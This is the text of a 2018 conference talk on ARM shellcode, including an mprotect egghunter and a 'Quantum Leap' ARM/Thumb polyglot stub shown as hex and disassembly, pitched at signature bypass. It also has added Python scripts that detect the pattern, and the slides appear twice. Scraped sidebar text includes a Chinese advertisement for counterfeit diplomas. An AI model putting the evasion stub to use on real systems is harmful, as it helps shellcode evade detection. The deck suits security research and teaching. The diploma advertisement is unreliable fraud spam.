NETSQUARE (c) SAUMIL SHAH 44CON 2018 LONDON
Make ARM Shellcode Great Again
Saumil Shah
@therealsaumil
13 September 2018
# who am i
• CEO Net-square.
• Hacker, Speaker, Trainer, Author.
• M.S. Computer Science, Purdue University.
• LinkedIn: saumilshah
• Twitter: @therealsaumil
Agenda
• A background on ARM shellcode
• My research around ARM shellcode
– cache coherency (solved before)
– space limitations
– polyglot tricks
• Demos
Shellcode in tight spaces
• Egghunter:
  – Searches for an EGG (4+4 byte value) in the process memory.
  – Uses syscalls to determine whether a memory page exists or not (safely).
  – Upon finding it, Egghunter transfers the control to the code following the egg.
• Nothing new here - done before.
Egghunter - Common Problems
• DEP
  – If Egg+shellcode is in a different memory region, then it may not be executable
  – e.g. Stack overflow, shellcode in the heap.
• ROP chains?
• Enter the mprotect egghunter!
mprotect Egghunter
[Figure: process memory map (Binary, Lib, Lib, heap, stack); overflow → ROP → mprotect → egghunter → shellcode (HACKHACK egg); regions marked RWX]
gef> vmmap
Start End Perm Path
0x00008000 0x00009000 rwx /home/pi/eggbreak
0x00010000 0x00011000 rwx /home/pi/eggbreak
0x00011000 0x00012000 rwx [heap]
0x00012000 0x00032000 rw- [heap]
0xb6e9c000 0xb6fbe000 r-x /lib/arm-linux-gnueabihf/libc-2.13.so
0xb6fbe000 0xb6fc5000 --- /lib/arm-linux-gnueabihf/libc-2.13.so
0xb6fc5000 0xb6fc7000 r-- /lib/arm-linux-gnueabihf/libc-2.13.so
0xb6fc7000 0xb6fc8000 rw- /lib/arm-linux-gnueabihf/libc-2.13.so
0xb6fc8000 0xb6fcb000 rw-
0xb6fd8000 0xb6ff5000 r-x /lib/arm-linux-gnueabihf/ld-2.13.so
0xb6ffa000 0xb6ffd000 rw-
0xb6ffd000 0xb6ffe000 r-- /lib/arm-linux-gnueabihf/ld-2.13.so
0xb6ffe000 0xb6fff000 rw- /lib/arm-linux-gnueabihf/ld-2.13.so
0xb6fff000 0xb7000000 r-x [sigpage]
0xbefdf000 0xbeffe000 rw-
0xbeffe000 0xbf000000 rwx [stack]
DEMO
mprotect egghunter
ARM Shellcode Polyglot Tricks
• Common trick in ARM shellcode is to switch to Thumb mode at the beginning.
• The "I can signature this" debate.
  – YARA Rules, IDS, Bro, blah blah…
• What if our target is a Thumb-only processor?
  – example: Cortex-M
• One Shellcode To Run Them All
"Quantum Leap" Shellcode
[Figure: two entry paths into the same bytes. Start in ARM mode: "LEAP" TO THUMB, then THUMB shellcode (execve, reverse, …). Start in THUMB mode: PASS THROUGH, PASS THROUGH, PASS THROUGH, then the same THUMB shellcode (execve, reverse, …). Caption: Quantum Leap. Same Same But Different.]
"Quantum Leap" - what we need
• An understanding of ARM and Thumb encoding:
  – ARM instruction: "DO SOMETHING"
  – 2 THUMB instructions: "PASS THROUGH"
• Conditional Execution in ARM instructions
  – very helpful!
• A little bit of luck and perseverance.
• Nomenclature Credit: "dialup".
Simple ARM to Thumb switch
• Avoid Branches, Load/Store, Floating Point, etc.
• Should work on ARMv6.
  – avoid Thumb2 instructions
• Avoid Illegal instructions.

ORIGINAL ARM CODE:
0: e28f1001 add r1, pc, #1
4: e12fff11 bx r1
8: 270b movs r7, #11
a: beff bkpt 0x00ff

"THUMB VIEW" (the same bytes decoded as Thumb):
0: 1001 asrs r1, r0, #32
2: e28f b.n 524
4: ff11 e12f vrhadd.u16 d14,d1,d31
8: 270b movs r7, #11
a: beff bkpt 0x00ff
ARM and THUMB decoding - 1
e28f1001: 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1
4 BYTE ARM INSTRUCTION, fields from high bits to low: conditional | opcode | status | operand 1 | destination | operand 2 (immediate)
[Figure: the upper halfword (conditional, opcode, status, operand 1) is Thumb instruction 2; the lower halfword (destination, operand 2 / immediate) is Thumb instruction 1]
Thumb instruction 2:
• Controlled by opcode and conditional flags.
• Partially influenced by the first operand.
• Trickier to control.
Thumb instruction 1:
• Controlled by Operands of the ARM instruction.
• Easier to control.
ARM and THUMB decoding - 1
e28f1001: 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1
1001: 0001 0000 0000 0001 asrs r1,r0,#32
e28f: 1110 0010 1000 1111 b 524
1 ARM INSTRUCTION RESULTING INTO 2 THUMB INSTRUCTIONS:
[Figure: same field layout (conditional | opcode | status | operand 1 | destination | operand 2 / immediate), split into the two Thumb halfwords]
• Branch instructions are destructive
• Thumb Opcode influenced by ARM conditional bits
(Un)conditional Instructions
• How can we turn an ARM instruction into a conditional instruction…
• …with guaranteed execution every time?
• COMPLEMENTARY CONDITIONS.
• One of the instructions is guaranteed to execute, irrespective of condition flags.

UNCONDITIONAL INSTRUCTION:
e28f1001 add r1, pc, #1

COMPLEMENTARY CONDITIONS:
128f1005 addne r1, pc, #5
028f1001 addeq r1, pc, #1
ARM and THUMB decoding - 2
128f1005: 0001 0010 1000 1111 0001 0000 0000 0101 addne r1,pc,#5
1005: 0001 0000 0000 0101 asrs r5,r0,#32
128f: 0001 0010 1000 1111 asrs r7,r1,#10
028f1001: 0000 0010 1000 1111 0001 0000 0000 0001 addeq r1,pc,#1
1001: 0001 0000 0000 0001 asrs r1,r0,#32
028f: 0000 0010 1000 1111 lsls r7,r1,#10
USING CONDITIONAL ARM INSTRUCTIONS:
[Figure: same field layout (conditional | opcode | status | operand 1 | destination | operand 2 / immediate) for the two conditional encodings]
• No destructive instructions in Thumb mode
• Complementary Conditional ARM instructions
Final "Quantum Leap" Code

QUANTUM LEAP: ARM TO THUMB (ARM view)
0: 228fa019 addcs sl, pc, #25
4: 328fa015 addcc sl, pc, #21
8: 21a0400d movcs r4, sp
c: 31a0400d movcc r4, sp
10: 292d0412 pushcs {r1, r4, sl}
14: 392d0412 pushcc {r1, r4, sl}
18: 28bda002 popcs {r1, sp, pc}
1c: 38bda002 popcc {r1, sp, pc}
20: beff bkpt 0x00ff
22: beff bkpt 0x00ff

QUANTUM LEAP: THUMB TO THUMB (Thumb view of the same bytes)
0: a019 add r0, pc, #100
2: 228f movs r2, #143
4: a015 add r0, pc, #84
6: 328f adds r2, #143
8: 400d ands r5, r1
a: 21a0 movs r1, #160
c: 400d ands r5, r1
e: 31a0 adds r1, #160
10: 0412 lsls r2, r2, #16
12: 292d cmp r1, #45
14: 0412 lsls r2, r2, #16
16: 392d subs r1, #45
18: a002 add r0, pc, #8
1a: 28bd cmp r0, #189
1c: a002 add r0, pc, #8
1e: 38bd subs r0, #189
20: beff bkpt 0x00ff
22: beff bkpt 0x00ff
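The decoding slides above (one ARM word = two Thumb halfwords, with the ARM condition bits landing in the second Thumb opcode) and the final listing can be checked mechanically from the analyst's side. The script below is an added example, not code from the talk or from the arm_shellcode repository: it splits an ARM word into its Thumb halves, classifies each half coarsely by its 16-bit ARMv6 Thumb encoding group (an assumption: only the 16-bit groups are modelled, and "data" is everything that is neither control flow, load/store, bkpt nor a 32-bit prefix), and scans a byte blob for consecutive words with complementary condition codes and matching opcode/register fields, which is the layout the final slide uses. The sample blob is constructed from the words on the slides.

```python
"""Decode a 32-bit ARM word as a Thumb core would read it and flag the
"Quantum Leap" layout (consecutive ARM instructions with complementary
conditions) in a byte blob.  Added example, not the talk's own code; the
Thumb classifier is coarse (16-bit ARMv6 groups only) and the pair scan is
a triage aid for reviewers, not a signature."""
import struct

COND = ["eq", "ne", "cs", "cc", "mi", "pl", "vs", "vc",
        "hi", "ls", "ge", "lt", "gt", "le", "al", "nv"]


def arm_cond(word):
    """Condition field is bits 31:28 of an ARM-state instruction."""
    return COND[word >> 28]


def complementary(cond_a, cond_b):
    """Conditions come in pairs that differ only in bit 0 (eq/ne, cs/cc, ...),
    so exactly one of such a pair executes; 'al' and 'nv' have no partner."""
    a, b = COND.index(cond_a), COND.index(cond_b)
    return a < 0xE and b < 0xE and (a ^ b) == 1


def thumb_halves(word):
    """Little-endian: the low halfword is fetched first in Thumb state, so the
    ARM destination/operand-2 bits become Thumb instruction 1 and the ARM
    condition/opcode/operand-1 bits become Thumb instruction 2."""
    return word & 0xFFFF, word >> 16


def thumb_class(hw):
    """Coarse class of a 16-bit Thumb encoding, keyed on its top five bits."""
    top5 = hw >> 11
    if top5 >= 0x1D:                          # 11101/11110/11111: 32-bit (BL, Thumb-2)
        return "32-bit"
    if top5 == 0x1C:                          # 11100: unconditional B
        return "branch"
    if top5 in (0x1A, 0x1B):                  # 1101x: B<cond>, UDF, SVC
        return "svc/udf" if (hw & 0xFF00) in (0xDE00, 0xDF00) else "branch"
    if top5 in (0x18, 0x19):                  # 1100x: STM / LDM
        return "load/store"
    if top5 in (0x16, 0x17):                  # 1011x: miscellaneous group
        if (hw & 0xFF00) == 0xBE00:
            return "bkpt"
        if (hw & 0xFF00) == 0xBD00:           # POP with PC in the register list
            return "pop-pc"
        if (hw & 0xF500) == 0xB100:           # CBZ/CBNZ (v6T2+; undefined on v6)
            return "branch"
        return "data"
    if top5 in (0x14, 0x15):                  # 1010x: ADR / ADD (SP + imm)
        return "data"
    if 0x09 <= top5 <= 0x13:                  # LDR literal through LDR/STR imm/reg/SP
        return "load/store"
    if top5 == 0x08:                          # 01000: data-processing, hi-reg ops, BX
        if (hw & 0xFF00) == 0x4700:
            return "bx"
        if (hw & 0xFF87) in (0x4487, 0x4687):  # ADD/MOV with Rd = pc
            return "mov-pc"
        return "data"
    return "data"                             # shifts, add/sub, mov/cmp/add/sub imm


def passes_through(word):
    """True when a Thumb core steps over both halves with no control-flow
    change, memory access, bkpt or 32-bit decode: the slide's PASS THROUGH."""
    return all(thumb_class(h) == "data" for h in thumb_halves(word))


def find_complementary_pairs(blob, mask=0x0FFFF000):
    """Scan 4-byte little-endian words and report offsets where two consecutive
    words carry complementary conditions and identical bits 27:12 (opcode,
    S bit, Rn, Rd).  Compilers also emit such pairs (moveq/movne), so a hit is
    a reason to look, not a verdict; the pass-through flag narrows it."""
    words = [w for (w,) in struct.iter_unpack("<I", blob[:len(blob) & ~3])]
    hits = []
    for i in range(len(words) - 1):
        a, b = words[i], words[i + 1]
        if complementary(arm_cond(a), arm_cond(b)) and (a & mask) == (b & mask):
            hits.append((i * 4, arm_cond(a), arm_cond(b),
                         passes_through(a) and passes_through(b)))
    return hits


# Constructed input: the eight words of the final "Quantum Leap" slide plus the
# two bkpt halfwords that terminate it, laid out little-endian as in memory.
LEAP = struct.pack("<8I", 0x228FA019, 0x328FA015, 0x21A0400D, 0x31A0400D,
                   0x292D0412, 0x392D0412, 0x28BDA002, 0x38BDA002) + b"\xff\xbe\xff\xbe"

if __name__ == "__main__":
    for w in (0xE28F1001, 0x128F1005, 0x028F1001):
        lo, hi = thumb_halves(w)
        print(f"{w:08x} {arm_cond(w)}: thumb1 {lo:04x}={thumb_class(lo)} "
              f"thumb2 {hi:04x}={thumb_class(hi)} pass-through={passes_through(w)}")
    for off, ca, cb, pt in find_complementary_pairs(LEAP):
        print(f"pair at +0x{off:x}: {ca}/{cb} pass-through={pt}")
```

Running it reproduces the slides: e28f1001 fails the pass-through test because its upper half e28f decodes as a Thumb branch, the addne/addeq pair passes, and the final blob yields four complementary pairs at offsets 0, 8, 0x10 and 0x18.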
Assembling the Quantum Leap
• No Thumb2 instructions.
• No NULL bytes.
• Many iterations.
• bx sl implemented by push {sl}, pop {pc}.
• Register list proved to be a challenge.
• Registers r4, sl altered (in ARM).
• Registers r0, r1, r2, r3 altered (in Thumb).
DEMO
Quantum Leap Shellcode
Conclusion
• ARM/Thumb Polyglot instructions and conditional execution offer many opportunities for obfuscation and signature bypass.
• Lots of exploration opportunities in ARM shellcoding.
https://github.com/therealsaumil/arm_shellcode
exit()
Saumil Shah
@therealsaumil
#44CON 2018
Preparing Non - Technical Founders for Engaging a Tech Agency
 
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdfTop Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
 
Microservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we workMicroservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we work
 
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
 
Liberarsi dai framework con i Web Component.pptx
Liberarsi dai framework con i Web Component.pptxLiberarsi dai framework con i Web Component.pptx
Liberarsi dai framework con i Web Component.pptx
 

Make ARM Shellcode Great Again

6. mprotect Egghunter

[Diagram: process memory with heap, stack, Lib, Lib and Binary; the shellcode is preceded by the HACKHACK egg; overflow → ROP → mprotect → egghunter; regions labelled RWX]

gef> vmmap
Start      End        Perm Path
0x00008000 0x00009000 rwx  /home/pi/eggbreak
0x00010000 0x00011000 rwx  /home/pi/eggbreak
0x00011000 0x00012000 rwx  [heap]
0x00012000 0x00032000 rw-  [heap]
0xb6e9c000 0xb6fbe000 r-x  /lib/arm-linux-gnueabihf/libc-2.13.so
0xb6fbe000 0xb6fc5000 ---  /lib/arm-linux-gnueabihf/libc-2.13.so
0xb6fc5000 0xb6fc7000 r--  /lib/arm-linux-gnueabihf/libc-2.13.so
0xb6fc7000 0xb6fc8000 rw-  /lib/arm-linux-gnueabihf/libc-2.13.so
0xb6fc8000 0xb6fcb000 rw-
0xb6fd8000 0xb6ff5000 r-x  /lib/arm-linux-gnueabihf/ld-2.13.so
0xb6ffa000 0xb6ffd000 rw-
0xb6ffd000 0xb6ffe000 r--  /lib/arm-linux-gnueabihf/ld-2.13.so
0xb6ffe000 0xb6fff000 rw-  /lib/arm-linux-gnueabihf/ld-2.13.so
0xb6fff000 0xb7000000 r-x  [sigpage]
0xbefdf000 0xbeffe000 rw-
0xbeffe000 0xbf000000 rwx  [stack]

7. DEMO: mprotect egghunter

8. ARM Shellcode Polyglot Tricks
• A common trick in ARM shellcode is to switch to Thumb mode at the beginning.
• The "I can signature this" debate.
  – YARA rules, IDS, Bro, blah blah…
• What if our target is a Thumb-only processor?
  – example: Cortex-M
• One Shellcode To Run Them All

9. "Quantum Leap" Shellcode
  Start in ARM mode   --"LEAP" TO THUMB-->  THUMB shellcode (execve, reverse, …)
  Start in THUMB mode --PASS THROUGH----->  THUMB shellcode (execve, reverse, …)
  Quantum Leap: Same Same But Different.

10. "Quantum Leap" - what we need
• An understanding of ARM and Thumb encoding:
  – ARM instruction: "DO SOMETHING"
  – 2 THUMB instructions: "PASS THROUGH"
• Conditional execution in ARM instructions - very helpful!
• A little bit of luck and perseverance.
• Nomenclature credit: "dialup".

11. Simple ARM to Thumb switch
• Avoid branches, load/store, floating point, etc.
• Should work on ARMv6.
  – avoid Thumb2 instructions
• Avoid illegal instructions.

ORIGINAL ARM CODE:
  0: e28f1001   add r1, pc, #1
  4: e12fff11   bx r1
  8: 270b       movs r7, #11
  a: beff       bkpt 0x00ff

"THUMB VIEW":
  0: 1001       asrs r1, r0, #32
  2: e28f       b.n 524
  4: ff11 e12f  vrhadd.u16 d14, d1, d31
  8: 270b       movs r7, #11
  a: beff       bkpt 0x00ff
12. ARM and THUMB decoding - 1

4-byte ARM instruction, e28f1001 = add r1, pc, #1:
  1110        0010 100   0        1111        0001          0000 0000 0001
  conditional opcode     status   operand 1   destination   operand 2 (immediate)

• The low halfword (1001) becomes Thumb instruction 1: controlled by the operands of the ARM instruction, so easier to control.
• The high halfword (e28f) becomes Thumb instruction 2: controlled by the opcode and conditional flags, partially influenced by the first operand, so trickier to control.

13. ARM and THUMB decoding - 1

One ARM instruction resulting in two Thumb instructions:
  e28f1001: 1110 0010 1000 1111 0001 0000 0000 0001   add r1, pc, #1
    1001:   0001 0000 0000 0001                       asrs r1, r0, #32
    e28f:   1110 0010 1000 1111                       b 524

• Branch instructions are destructive.
• The Thumb opcode is influenced by the ARM conditional bits.

14. (Un)conditional Instructions
• How can we turn an ARM instruction into a conditional instruction…
• …with guaranteed execution every time?
• COMPLEMENTARY CONDITIONS.
• One of the two instructions is guaranteed to execute, irrespective of the condition flags.

  e28f1001   add r1, pc, #1      UNCONDITIONAL INSTRUCTION
  128f1005   addne r1, pc, #5    COMPLEMENTARY CONDITIONS
  028f1001   addeq r1, pc, #1

15. ARM and THUMB decoding - 2

Using conditional ARM instructions:
  128f1005: 0001 0010 1000 1111 0001 0000 0000 0101   addne r1, pc, #5
    1005:   0001 0000 0000 0101                       asrs r5, r0, #32
    128f:   0001 0010 1000 1111                       asrs r7, r1, #10
  028f1001: 0000 0010 1000 1111 0001 0000 0000 0001   addeq r1, pc, #1
    1001:   0001 0000 0000 0001                       asrs r1, r0, #32
    028f:   0000 0010 1000 1111                       lsls r7, r1, #10

• Complementary conditional ARM instructions.
• No destructive instructions in Thumb mode.

16. Final "Quantum Leap" Code

QUANTUM LEAP: ARM TO THUMB
   0: 228fa019   addcs sl, pc, #25
   4: 328fa015   addcc sl, pc, #21
   8: 21a0400d   movcs r4, sp
   c: 31a0400d   movcc r4, sp
  10: 292d0412   pushcs {r1, r4, sl}
  14: 392d0412   pushcc {r1, r4, sl}
  18: 28bda002   popcs {r1, sp, pc}
  1c: 38bda002   popcc {r1, sp, pc}
  20: beff       bkpt 0x00ff
  22: beff       bkpt 0x00ff

QUANTUM LEAP: THUMB TO THUMB
   0: a019   add r0, pc, #100
   2: 228f   movs r2, #143
   4: a015   add r0, pc, #84
   6: 328f   adds r2, #143
   8: 400d   ands r5, r1
   a: 21a0   movs r1, #160
   c: 400d   ands r5, r1
   e: 31a0   adds r1, #160
  10: 0412   lsls r2, r2, #16
  12: 292d   cmp r1, #45
  14: 0412   lsls r2, r2, #16
  16: 392d   subs r1, #45
  18: a002   add r0, pc, #8
  1a: 28bd   cmp r0, #189
  1c: a002   add r0, pc, #8
  1e: 38bd   subs r0, #189
  20: beff   bkpt 0x00ff
  22: beff   bkpt 0x00ff
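To look at slides 12 to 16 from the analyst's side, here is an added Python example (not code from the talk or its repository) that splits an ARM word into the fields shown on slide 12, coarsely classifies the two Thumb halfwords it decodes as, and scans a blob for adjacent words that share opcode/S/Rn/Rd but carry complementary condition codes, which is the shape a signature for this construction would key on. The function names are mine, the sample bytes are the slide 16 listing, and the Thumb classifier only knows the few encoding classes the slides mention.

```python
import struct

# ARM condition codes (bits 31:28); each even/odd pair (eq/ne, cs/cc, ...)
# is complementary, so exactly one instruction of such a pair executes.
COND = ["eq", "ne", "cs", "cc", "mi", "pl", "vs", "vc",
        "hi", "ls", "ge", "lt", "gt", "le", "al", "nv"]

def arm_fields(word: int) -> dict:
    """Split a 32-bit ARM data-processing word into the slide 12 fields.
    'thumb' is the pair of 16-bit halfwords a Thumb decoder sees at the
    same address (little-endian, so the low halfword comes first)."""
    return {
        "cond": COND[word >> 28],
        "opcode": (word >> 21) & 0xF,   # 0b0100 is ADD
        "s": (word >> 20) & 1,
        "rn": (word >> 16) & 0xF,
        "rd": (word >> 12) & 0xF,
        "operand2": word & 0xFFF,
        "thumb": (word & 0xFFFF, word >> 16),
    }

def thumb_kind(hw: int) -> str:
    """Coarse class of a 16-bit Thumb halfword; 'b', 'bcond' and 'thumb2'
    are the destructive cases the slides avoid in the Thumb view."""
    if (hw >> 11) == 0b11100:
        return "b"              # unconditional branch (e28f on slide 13)
    if (hw >> 11) in (0b11101, 0b11110, 0b11111):
        return "thumb2"         # first half of a 32-bit encoding (ff11)
    if (hw >> 12) == 0b1101 and ((hw >> 8) & 0xF) < 0xE:
        return "bcond"          # conditional branch
    if (hw >> 13) == 0:
        return "shift-imm"      # lsls/lsrs/asrs rd, rm, #imm (1001, 128f)
    return "other"

def complementary_pairs(blob: bytes) -> list:
    """Offsets of adjacent ARM words that share bits 27:12 (opcode, S, Rn,
    Rd) but carry complementary condition codes: the Quantum Leap shape."""
    words = [w for (w,) in struct.iter_unpack("<I", blob)]
    hits = []
    for i in range(len(words) - 1):
        a, b = words[i], words[i + 1]
        same_op = ((a >> 12) & 0xFFFF) == ((b >> 12) & 0xFFFF)
        if (a >> 28) != 0xE and (b >> 28) == ((a >> 28) ^ 1) and same_op:
            hits.append((i * 4, COND[a >> 28], COND[b >> 28]))
    return hits

# Constructed from the slide 16 "Quantum Leap" listing (little-endian words).
LEAP = struct.pack("<9I", 0x228FA019, 0x328FA015, 0x21A0400D, 0x31A0400D,
                   0x292D0412, 0x392D0412, 0x28BDA002, 0x38BDA002, 0xBEFFBEFF)
```

Running complementary_pairs over LEAP reports the four cs/cc pairs at offsets 0, 8, 16 and 24, while a plain Thumb payload such as the execve stub on slide 11 produces no hit.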
17. Assembling the Quantum Leap
• No Thumb2 instructions.
• No NULL bytes.
• Many iterations.
• bx sl implemented by push {sl}, pop {pc}.
• Register list proved to be a challenge.
• Registers r4, sl altered (in ARM).
• Registers r0, r1, r2, r3 altered (in Thumb).

18. DEMO: Quantum Leap Shellcode

19. Conclusion
• ARM/Thumb polyglot instructions and conditional execution offer many opportunities for obfuscation and signature bypass.
• Lots of exploration opportunities in ARM shellcoding.
https://github.com/therealsaumil/arm_shellcode

20. exit()
Saumil Shah
@therealsaumil
#44CON 2018